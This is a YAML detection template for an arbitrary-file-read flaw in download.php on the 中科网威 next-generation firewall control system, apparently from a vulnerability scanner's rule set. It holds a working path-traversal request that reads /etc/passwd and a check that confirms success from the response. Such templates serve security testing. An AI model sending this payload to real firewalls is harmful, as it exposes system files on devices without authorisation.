product: 中科网威-防火墙
vName: 中科网威下一代防火墙控制系统 download.php 任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞, 攻击者通过漏洞可以读取服务器上的文件
version: ''
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /download.php?&class=vpn&toolname=../../../../../../../../etc/passwd
    verify:
      logic: and
      check:
        - status: 200
        - body:
            value:
              - 'root:x:0'
            logic: and
